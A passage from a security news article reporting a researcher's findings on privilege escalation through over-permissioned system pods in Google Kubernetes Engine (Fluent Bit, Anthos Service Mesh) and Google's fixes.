"The clusterrole-aggregation-controller (CRAC) service account is probably the leading candidate, as it can add arbitrary permissions to existing cluster roles," security researcher Shaul Ben Hai said. "The attacker can update the cluster role bound to CRAC to possess all privileges."

By way of fixes, Google has removed Fluent Bit's access to the service account tokens and re-architected the functionality of ASM to remove excessive role-based access control (RBAC) permissions.

"Cloud vendors automatically create system pods when your cluster is launched," Ben Hai concluded. "They are built in your Kubernetes infrastructure, the same as add-on pods that have been created when you enable a feature."

"This is because cloud or application vendors typically create and manage them, and the user has no control over their configuration or permissions. This can also be extremely risky since these pods run with elevated privileges."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#web